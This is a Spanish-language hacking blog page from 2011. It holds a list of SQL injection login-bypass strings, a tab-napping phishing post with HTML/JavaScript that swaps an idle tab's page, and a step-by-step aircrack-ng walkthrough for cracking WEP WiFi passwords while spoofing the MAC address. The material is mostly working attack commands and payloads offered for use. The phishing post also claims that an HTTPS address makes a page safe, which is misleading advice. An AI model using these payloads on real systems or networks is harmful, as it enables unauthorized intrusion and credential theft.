‘ | ; | ‘; | ‘-- | ‘or 1=1 -- | ‘ or 1=1 -- | ‘or 1=1 -- | ‘ or 1 = 1 -- | ‘ or 1=1 --
or 1=1 -- | or 1=1 -- | or 1 = 1 -- | or 1=1-- | “ or 1=1 -- | ‘ or a=a -- | “ or “a”=”a
‘) or (‘a’=’a | “) or (“a”=”a | a” or “a”=”a | a” or 1=1 -- | a’ or 1=1 -- |
a’ or ‘a’=’a | a’) or (‘a’=’a | a”) or (“a”=”a | admin’-- | ‘ or 0=0 -- | “ or 0=0 --
| or 0=0 -- | ‘ or 0=0# | “ or 0=0# | or 0=0# | )’or 1=1;
--------------------------------------- Cautivo en las selvas de occidente te trajeron a Roma, esclavo, te dieron el oficio de herrero y haces cadenas. El hierro al rojo que sacas de los hornos lo puedes moldear como quieras, puedes hacer espadas para que tus paisanos rompan sus cadenas, pero tu, ese esclavo, haces cadenas, mas cadenas. Joseba Sarrionaindia. ---------------------------------------
martes, 11 de octubre de 2011
miércoles, 5 de octubre de 2011
Tab Napping
Phishing Technique: Tab Napping short code
Author: Jordan Diaz (aka Jbyte)
Website:http://jbyte-security.blogspot.com/
El "tab napping" se aprovecha de los nuevos navegadores y su sistema de varias pestañas. En ellos, sólo hace falta abrir en una ventana el navegador, y se pueden abrir varias pestañas (pulsando la combinación Control T o simplemente asiendo click) para poder navegar en varias páginas a la vez.
Este sistema reconoce qué pestañas están siendo usadas y cuales, aunque están abiertas, no han sido utilizadas en un rato. Estas últimas, cambian sin que nos demos cuenta a una de esas webs clonadas, y si tenemos la mala suerte de entrar en esa pestaña y meter nuestros datos bancarios, los delicuentes ya los tendrán para hacer con ellos lo que quieran.
¿Cómo funciona?
Este sistema instala un código Java Script en nuestro navegador, que hace que la página buena, por ejemplo la del Banco Santander, cambia a una página clonada, sin que, a priori, nos demos cuenta, cuando la pestaña en la que se muestra la web legal del Banco Santander lleve un rato inactiva.
¿Cómo evitarlo?
Podemos identificar si la web es segura o no observando la barra de direcciones. Si la URL empieza con una dirección HTTPS:// es segura.
Siempre, y repetimos, SIEMPRE, hay que fijarse que la dirección de la página de nuestro banco o de una tienda en la que queramos comprar empieza de este modo, antes de dar nuestro número de tarjeta o nuestra contraseña. Es la manera de comprobar que la página está verificada y protegida de timos como éste o como el phising.
Sencillo pero las prisas del día a día o simplemente los descuidos hacen que en ocasiones nos quedem
short Code:
<html>
<head>
<script type="text/javascript">
function setFocus(){
document.getElementById("surname").focus();
}
function sinfoco()
{var pagina = 'http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png';
//document.getElementById("searchBox").focus();
//document.location.href=pagina;
document.documentElement.innerHTML="<html><img src='http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png'></html>";
}
</script>
</head>
<body onload="setFocus();">
<form>
Name: <input type="text" id="name" size="30"><br />
Surname: <input type="text" id="surname" size="30" onblur=sinfoco()>
</form>
</body>
</html>
Solo nos queda copiar el texto y guardarlo como un archivo html y listo, nos al cambiar de pesataña nos redirigira a una web con una imagen de gmai.
FIN
http://www.exploit-db.com/papers/13953/
lunes, 3 de octubre de 2011
Crack red wifi con cifrado WEP
Detenemos la interfaz de red que vamos a utilizar con el comando ifconfig:
#ifconfig <interfaz de red> down
Ponemos la interfaz en modo monitor:
#airmon-ng start <interfaz de red>
escaneamos las redes a nuestro alcance con airodump-ng
#airodump-ng <interfaz de red>
Una vez elegida una red con cifrado WEP y que tengamos buena señal paramos el airodump-ng anterior e introducimos el comando siguiente:
# airodump-ng -w <archivo de captura> --bssid <MAC del AP> -c <canal del AP victima> <interfaz de red>
Ahora realizamos el ataque al punto de acceso con cifrado WEP utilizando el comando aireplay-ng:
Con este primer comando nos asociamos al AP:
# aireplay-ng -1 10 -e <nombre del AP> -a <MAC del AP> -h <nuestra MAC> <interfaz de red>
Una vez asociado al AP :-) reinyectamos paquetes para que suba el campo #Data en la ventana del airodump-ng
# aireplay-ng -3 -b <MAC del AP> -h <nuestra MAC> <interfaz de red>
Una vez que veamos que en el campo data tenemos unos cuantos pauqtes, mas de 20.000 podemos empezar a intentar conseguir la contraseña con el comando aircrack-ng
# aircrack-ng <archivo de captura>
Es recomendable cambiar antes la mac de nuestra tarjeta wifi, para ello se puede utilizar el macchanger.
#macchanger -m <falsa MAC>
o el comando ifconfig:
#ifconfig eth0 hw ether <falsa MAC>
Nota: WEP significa Wired Equivalent Privacy o "Privacidad Equivalente a Cableado".
Suscribirse a:
Comentarios (Atom)